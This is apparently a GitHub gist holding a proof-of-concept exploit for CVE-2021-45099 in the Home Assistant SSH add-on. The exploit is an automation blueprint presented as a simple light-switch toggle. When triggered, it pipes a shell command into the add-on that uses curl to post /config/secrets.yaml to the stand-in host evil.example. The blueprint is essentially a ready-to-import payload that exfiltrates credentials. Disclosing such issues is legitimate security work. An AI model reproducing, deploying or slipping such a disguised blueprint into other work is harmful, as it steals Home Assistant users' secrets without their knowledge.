Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PoC for github.com/hassio-addons/addon-ssh <= 9.1.1 - CVE-2021-45099
blueprint:
name: PoC for CVE-2021-45099
description: the not-a-vulnerability was patched in github.com/hassio-addons/addon-ssh v10.0.0
domain: automation
input:
boolean:
name: Toggle
description: Some boolean light switch.
selector:
entity:
domain: light
trigger:
- platform: state
entity_id: !input boolean
action:
service: hassio.addon_stdin
data:
addon: a0d7b954_ssh
input: 'curl -X POST --data-binary "@/config/secrets.yaml" http://evil.example'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment